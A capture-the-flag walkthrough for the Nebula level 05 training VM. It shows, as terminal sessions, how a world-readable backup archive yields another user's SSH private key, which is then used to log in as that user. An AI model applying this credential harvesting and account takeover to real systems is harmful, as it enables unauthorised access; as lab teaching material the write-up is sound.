"Whatever Pages"

Weak permissions

         Nebula 05 Agenda: “Check the flag05 home directory. You are looking for weak directory permissions”


 1 level05@nebula:~$ cd /home/flag05
 2 level05@nebula:/home/flag05$ ls -la
 3 total 5
 4 drwxr-x--- 4 flag05 level05   93 2012-08-18 06:56 .
 5 drwxr-xr-x 1 root   root     100 2012-08-27 07:18 ..
 6 drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
 7 -rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
 8 -rw-r--r-- 1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
 9 -rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
10 drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh
11 
12 level05@nebula:/home/flag05$ cd ./.backup/
13 level05@nebula:/home/flag05/.backup$ ls -la
14 total 2
15 drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
16 drwxr-x--- 4 flag05 level05   93 2012-08-18 06:56 ..
17 -rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz
18 
19 level05@nebula:/home/flag05/.backup$ file backup-19072011.tgz
20 backup-19072011.tgz: gzip compressed data, from Unix, last modified: 
21 Tue Jul 19 02:38:48 2011
22 
23 level05@nebula:/home/flag05/.backup$ mkdir /tmp/flag05/
24 level05@nebula:/home/flag05/.backup$ cd /tmp/flag05/
25 
26 level05@nebula:/tmp/flag05$ tar -xzvf /home/flag05/.backup/backup-19072011.tgz
27 .ssh/
28 .ssh/id_rsa.pub
29 .ssh/id_rsa
30 .ssh/authorized_keys

Therefore the “weak” directory was the hidden “/home/flag05/.backup” folder. To extract archive we used tar utility (line #26). And as result we have public (“id_rsa.pub”) and private (“id_rsa”) ssh rsa keys. In an asymmetric key encryption scheme, anyone can encrypt messages using the public key, but only the holder of the paired private key can decrypt. Security depends on the secrecy of the private key. Now we can use OpenSSH SSH client with usage of identity(private key) to login as “flag05” user:

1 level05@nebula:/tmp/flag05$ ssh -i ./.ssh/id_rsa flag05@localhost
2 
3 flag05@nebula:~$ getflag
4 You have successfully executed getflag on a target account